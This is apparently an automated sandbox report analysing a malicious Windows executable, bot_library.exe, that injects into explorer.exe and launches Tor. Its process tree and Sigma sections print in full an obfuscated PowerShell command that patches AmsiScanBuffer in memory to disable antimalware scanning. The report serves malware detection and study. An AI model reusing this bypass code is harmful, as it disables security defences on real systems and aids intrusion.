Edit tour

Windows Analysis Report
bot_library.exe

Overview

General Information

Sample name:	bot_library.exe
Analysis ID:	1510303
MD5:	1f669ce249a053178531a1f2009f150b
SHA1:	0007d6a74135997b15b0d6327230b08a0488b06e
SHA256:	28cefc6fdac17623b223a16ead72f6afa6af60eae3600a9834aaa9349c9cf6b2
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Allocates memory in foreign processes

Bypasses PowerShell execution policy

Found Tor onion address

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Tor Client/Browser Execution

Suspicious powershell command line found

Very long command line found

Writes to foreign memory regions

Contains functionality to detect virtual machines (SLDT)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64native

bot_library.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\bot_library.exe" MD5: 1F669CE249A053178531A1F2009F150B)

conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6208 cmdline: "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) Write-Output $c4CimfTfCCk.CreateType() } $uyj2j3Lvrx9rm = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -and $_.Location.Split([char](92))[-1].Equals([char](83)+[char](121)+[char](115)+[char](116)+[char](101)+[char](109)+[char](46)+[char](100)+[char](108)+[char](108)) }).GetType([char](77)+[char](105)+[char](99)+[char](114)+[char](111)+[char](115)+[char](111)+[char](102)+[char](116)+[char](46)+[char](87)+[char](105)+[char](110)+[char](51)+[char](50)+[char](46)+[char](85)+[char](110)+[char](115)+[char](97)+[char](102)+[char](101)+[char](78)+[char](97)+[char](116)+[char](105)+[char](118)+[char](101)+[char](77)+[char](101)+[char](116)+[char](104)+[char](111)+[char](100)+[char](115)) $Wnm1caLcDs99Mo = $uyj2j3Lvrx9rm.GetMethod( [char](71)+[char](101)+[char](116)+[char](80)+[char](114)+[char](111)+[char](99)+[char](65)+[char](100)+[char](100)+[char](114)+[char](101)+[char](115)+[char](115), [Reflection.BindingFlags]([char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](116)+[char](97)+[char](116)+[char](105)+[char](99)), $Null, [Reflection.CallingConventions]::Any, @((New-Object IntPtr).GetType(), [string]), $Null) $xKiBid8qRA54vF95cHp = Get-Delegate @([String])([IntPtr]) $EXdNW0TegGqR3K27LZLuyI = Get-Delegate @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType())([Bool]) $GKRnFb5RWfm = $uyj2j3Lvrx9rm.GetMethod([char](71)+[char](101)+[char](116)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101)+[char](72)+[char](97)+[char](110)+[char](100)+[char](108)+[char](101)).Invoke($Null, @([Object]([char](107)+[char](101)+[char](114)+[char](110)+[char](101)+[char](108)+[char](51)+[char](50)+[char](46)+[char](100)+[char](108)+[char](108)))) $DVVemkOahpu8su = $Wnm1caLcDs99Mo.Invoke($Null, @([Object]$GKRnFb5RWfm, [Object]([char](76)+[char](111)+[char](97)+[char](100)+[char](76)+[char](105)+[char](98)+[char](114)+[char](97)+[char](114)+[char](121)+[char](65)))) $KSsjvniRewgsX1zDn = $Wnm1caLcDs99Mo.Invoke($Null, @([Object]$GKRnFb5RWfm, [Object]([char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108)+[char](80)+[char](114)+[char](111)+[char](116)+[char](101)+[char](99)+[char](116)))) $cObJlA1 = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DVVemkOahpu8su, $xKiBid8qRA54vF95cHp).Invoke([char](97)+[char](109)+[char](115)+[char](105)+[char](46)+[char](100)+[char](108)+[char](108)) $dkxoFnOvnR4GkN4Ph = $Wnm1caLcDs99Mo.Invoke($Null, @([Object]$cObJlA1, [Object]([char](65)+[char](109)+[char](115)+[char](105)+[char](83)+[char](99)+[char](97)+[char](110)+[char](66)+[char](117)+[char](102)+[char](102)+[char](101)+[char](114)))) $9GZ4el8CE4 = 0 [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KSsjvniRewgsX1zDn, $EXdNW0TegGqR3K27LZLuyI).Invoke($dkxoFnOvnR4GkN4Ph, [uint32]8, 4, [ref]$9GZ4el8CE4) [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8, 0x57, 0x00, 0x07, 0x80, 0xc3), 0, $dkxoFnOvnR4GkN4Ph, 6); [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KSsjvniRewgsX1zDn, $EXdNW0TegGqR3K27LZLuyI).Invoke($dkxoFnOvnR4GkN4Ph, [uint32]8, 0x20, [ref]$9GZ4el8CE4) " MD5: 04029E121A0CFA5991749937DD22A1D9)

explorer.exe (PID: 8404 cmdline: "C:\Windows\explorer.exe" MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

tor.exe (PID: 8584 cmdline: "C:/Tor/tor/tor.exe" -f C:/Tor/torrc MD5: A46913AB31875CF8152C96BD25027B4D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) Write-Output $c4CimfTfCCk.CreateType() } $uyj2j3Lvrx9rm = ([AppDomain]::CurrentDomain.GetAssemb

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) Write-Output $c4CimfTfCCk.CreateType() } $uyj2j3Lvrx9rm = ([AppDomain]::CurrentDomain.GetAssemb

Sigma detected: Tor Client/Browser Execution

Source: Process started

Author: frack113: Data: Command: "C:/Tor/tor/tor.exe" -f C:/Tor/torrc, CommandLine: "C:/Tor/tor/tor.exe" -f C:/Tor/torrc, CommandLine|base64offset|contains: , Image: C:\Tor\tor\tor.exe, NewProcessName: C:\Tor\tor\tor.exe, OriginalFileName: C:\Tor\tor\tor.exe, ParentCommandLine: "C:\Users\user\Desktop\bot_library.exe", ParentImage: C:\Users\user\Desktop\bot_library.exe, ParentProcessId: 6340, ParentProcessName: bot_library.exe, ProcessCommandLine: "C:/Tor/tor/tor.exe" -f C:/Tor/torrc, ProcessId: 8584, ProcessName: tor.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) Write-Output $c4CimfTfCCk.CreateType() } $uyj2j3Lvrx9rm = ([AppDomain]::CurrentDomain.GetAssemb

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) Write-Output $c4CimfTfCCk.CreateType() } $uyj2j3Lvrx9rm = ([AppDomain]::CurrentDomain.GetAssemb

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: tor.exe, 00000005.00000003.99668088967.000002835A0F9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_673c3127-c

Source: unknown

HTTPS traffic detected: 159.69.63.226:443 -> 192.168.11.20:49745 version: TLS 1.2

Source: bot_library.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: bot_library.pdb> source: bot_library.exe, 00000000.00000003.99400379023.00000246AFD40000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99965602166.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, bot_library.exe, 00000000.00000000.99352983968.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp
Source:	Binary string: bot_library.pdb source: bot_library.exe, 00000000.00000003.99400379023.00000246AFD40000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99965602166.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, bot_library.exe, 00000000.00000000.99352983968.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp

Networking

Found Tor onion address

Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp

String found in binary or memory: HiddenServiceDirHiddenServiceDirGroupReadable0HiddenServicePortHiddenServiceVersion-1HiddenServiceAllowUnknownPortsHiddenServiceMaxStreamsHiddenServiceMaxStreamsCloseCircuitHiddenServiceNumIntroductionPoints3HiddenServiceExportCircuitIDHiddenServiceEnableIntroDoSDefenseHiddenServiceEnableIntroDoSRatePerSec25HiddenServiceEnableIntroDoSBurstPerSec200HiddenServiceOnionBalanceInstanceHiddenServicePoWDefensesEnabledHiddenServicePoWQueueRate250HiddenServicePoWQueueBurst2500config_generic_servicehs_optsservicehs_opts->HiddenServiceDir%s=%s. Configuring...Onion services version 2 are obsolete. Please see https://blog.torproject.org/v2-deprecation-timeline for more details and for instructions on how to transition to version 3. %s!err_msgHiddenServicePort=%s for %scheck_value_oob%s must be %d, not %d.%s must be between %d and %d, not %d.config_learn_service_versionconfig_has_invalid_optionsHiddenServiceAuthorizeClientt-

Source: global traffic	TCP traffic: 192.168.11.20:49752 -> 45.138.16.240:8100
Source: global traffic	TCP traffic: 192.168.11.20:49753 -> 45.148.121.112:9001
Source: global traffic	TCP traffic: 192.168.11.20:49754 -> 23.111.179.34:626

Source: global traffic

HTTP traffic detected: GET /tor-package-archive/torbrowser/13.5.2/tor-expert-bundle-windows-x86_64-13.5.2.tar.gz HTTP/1.1accept: */*host: archive.torproject.org

Source: Joe Sandbox View

IP Address: 159.69.63.226 159.69.63.226

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 109.69.67.17
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.240

Source: global traffic

HTTP traffic detected: GET /tor-package-archive/torbrowser/13.5.2/tor-expert-bundle-windows-x86_64-13.5.2.tar.gz HTTP/1.1accept: */*host: archive.torproject.org

Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: tor.exe, 00000005.00000002.100611977010.00000283572FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: tor.exe, 00000005.00000002.100611977010.00000283572FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.comVanilla equals www.yahoo.com (Yahoo)
Source: tor.exe, 00000005.00000002.100611977010.00000283572FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.comardsess equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: archive.torproject.org

